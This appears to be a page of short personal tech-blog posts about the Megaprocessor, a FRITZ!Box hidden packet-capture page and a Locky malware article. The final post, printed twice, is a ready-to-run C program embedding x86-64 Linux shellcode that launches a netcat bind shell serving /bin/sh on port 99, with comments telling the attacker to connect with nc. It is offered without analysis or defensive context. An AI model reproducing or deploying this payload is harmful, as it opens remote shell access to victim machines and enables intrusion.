Jul 16 08
James Newman from Cabridge builds his own very huge „micro“-processor called The Megaprocessor.

This awesome 16bit processor is about 10m long and 2m tall has thousands of LEDs more than 40 thousands of transistors. It has 256 byte RAM and a clock rate of 20kHz!
You can find more information, videos and a couple of articles (The Register and the BBC News) about The Megaprocessor at the project page or at facebook.
written by d45id
\\ tags: 16bit, computer, hardware, Megaprocessor, project
Jul 16 06
Router der Marke FRITZ!Box verfügen über einen mehr oder weniger versteckten Modus in dem sich sehr einfach und schnell Paketmitschnitte auf den einzelnen Schnittstellen erstellen und im pcap (packet capture) Format speichern lassen.
Aufrufen lässt sich das Menü über die Webschnittstelle indem die Unterseite /html/capture.html aufgerufen wird. Eine valide Benutzerkennung ist von Nöten.
Beispiel: http://192.168.178.1/html/capture.html

written by d45id
\\ tags: debugging, FRITZ!Box, network, pcap, wireshark
Jul 16 06
Floser Bacurio and Roland Dela Paz published an interesting article about Locky’s new anti-sandbox technique and how to crack it.
Find out more: Cracking Locky’s New Anti-Sandbox Technique
written by d45id
\\ tags: forensic, LOCKY, malware, Security
Jul 16 06
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| #include <stdio.h>
#include <string.h>
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
unsigned char code[] = \
#define PORT "\x39\x39"
// Keep to two bytes
"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
;
int main ()
{
// I make sure there are no nulls
// The string count will terminate at the first \x00
printf("The Shellcode is %d Bytes Long\n", strlen(code));
// Next I throw 0xAAAAAAAA into every register before shellcode execution
// This ensures that the shellcode will run in any circumstance
__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
"call code");
return 0;
} |
#include <stdio.h>
#include <string.h>
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
unsigned char code[] = \
#define PORT "\x39\x39"
// Keep to two bytes
"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
;
int main ()
{
// I make sure there are no nulls
// The string count will terminate at the first \x00
printf("The Shellcode is %d Bytes Long\n", strlen(code));
// Next I throw 0xAAAAAAAA into every register before shellcode execution
// This ensures that the shellcode will run in any circumstance
__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
"call code");
return 0;
}
written by d45id
\\ tags: exploit, hacking, Linux, netcat, Security